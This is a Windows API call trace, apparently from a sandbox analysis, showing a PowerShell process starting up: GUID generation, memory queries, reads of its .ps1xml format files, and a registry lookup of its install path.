	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x9b34b7e8, Data2=0x8b93, Data3=0x4beb, Data4=([0]=0x9c, [1]=0x63, [2]=0x70, [3]=0x3, [4]=0x1f, [5]=0x94, [6]=0xbf, [7]=0xd3))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xcf0ac6ff, Data2=0x337d, Data3=0x4a10, Data4=([0]=0xb9, [1]=0x6a, [2]=0xf0, [3]=0xad, [4]=0xe0, [5]=0x25, [6]=0x8c, [7]=0x42))) returned 0x0
	[0400.157] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x2d04e20c, Data2=0x264c, Data3=0x41ec, Data4=([0]=0x80, [1]=0x10, [2]=0x9e, [3]=0xc3, [4]=0x3a, [5]=0x60, [6]=0xac, [7]=0xe0))) returned 0x0
	[0400.157] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x19ab5fd7, Data2=0x1dc0, Data3=0x4adf, Data4=([0]=0x90, [1]=0xfd, [2]=0xaf, [3]=0x13, [4]=0x55, [5]=0x38, [6]=0xa9, [7]=0x5a))) returned 0x0
	[0400.157] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.157] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.158] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.158] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xa4041f50, Data2=0x48d1, Data3=0x4c11, Data4=([0]=0x8a, [1]=0xa6, [2]=0x21, [3]=0x20, [4]=0xf5, [5]=0xa, [6]=0xdf, [7]=0x4b))) returned 0x0
	[0400.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.159] SetErrorMode (uMode=0x1) returned 0x1
	[0400.159] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0400.159] GetFileType (hFile=0x300) returned 0x1
	[0400.159] SetErrorMode (uMode=0x1) returned 0x1
	[0400.159] GetFileType (hFile=0x300) returned 0x1
	[0400.159] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.160] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.160] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.160] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.161] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.161] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.161] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x119, lpOverlapped=0x0) returned 1
	[0400.161] ReadFile (in: hFile=0x300, lpBuffer=0x37e8e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x37e8e28*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0400.161] CloseHandle (hObject=0x300) returned 1
	[0400.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.162] SetErrorMode (uMode=0x1) returned 0x1
	[0400.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0400.162] SetErrorMode (uMode=0x1) returned 0x1
	[0400.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0400.162] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0400.162] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0400.162] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0400.162] CoTaskMemFree (pv=0x47ed70) 
	[0400.163] RegCloseKey (hKey=0x300) returned 0x0
	[0400.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.165] VirtualQuery (in: lpAddress=0x26bbe0, lpBuffer=0x26caa0, dwLength=0x30 | out: lpBuffer=0x26caa0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.165] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7aec524b, Data2=0xec4c, Data3=0x4391, Data4=([0]=0x8f, [1]=0xec, [2]=0xfb, [3]=0xf1, [4]=0xc7, [5]=0xc0, [6]=0x8, [7]=0x55))) returned 0x0
	[0400.165] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.165] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x15c96223, Data2=0xc128, Data3=0x4ba1, Data4=([0]=0xad, [1]=0xb1, [2]=0xf7, [3]=0x3f, [4]=0xbb, [5]=0x48, [6]=0xdf, [7]=0xc2))) returned 0x0
	[0400.166] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xdd0e0e52, Data2=0xdd68, Data3=0x4756, Data4=([0]=0xa1, [1]=0x39, [2]=0x63, [3]=0x7c, [4]=0x94, [5]=0xdd, [6]=0xd1, [7]=0xce))) returned 0x0
	[0400.166] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7b31160a, Data2=0x86df, Data3=0x4238, Data4=([0]=0x94, [1]=0x30, [2]=0x8b, [3]=0x55, [4]=0xa2, [5]=0xf, [6]=0xd9, [7]=0xb6))) returned 0x0
	[0400.166] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.166] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.166] SetErrorMode (uMode=0x1) returned 0x1
	[0400.166] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0400.167] GetFileType (hFile=0x300) returned 0x1
	[0400.167] SetErrorMode (uMode=0x1) returned 0x1
	[0400.167] GetFileType (hFile=0x300) returned 0x1
	[0400.167] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.167] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.168] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.168] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.168] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.169] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.169] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.169] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.170] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.170] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.646] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.646] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.647] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.647] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.647] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.647] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.648] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.648] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.648] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.649] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.649] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.649] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.649] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.649] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.650] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.650] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.650] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.650] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.651] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.651] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.651] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.651] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.653] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.653] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.654] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.654] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.654] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.654] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.654] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.655] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.655] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.655] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.655] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.656] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
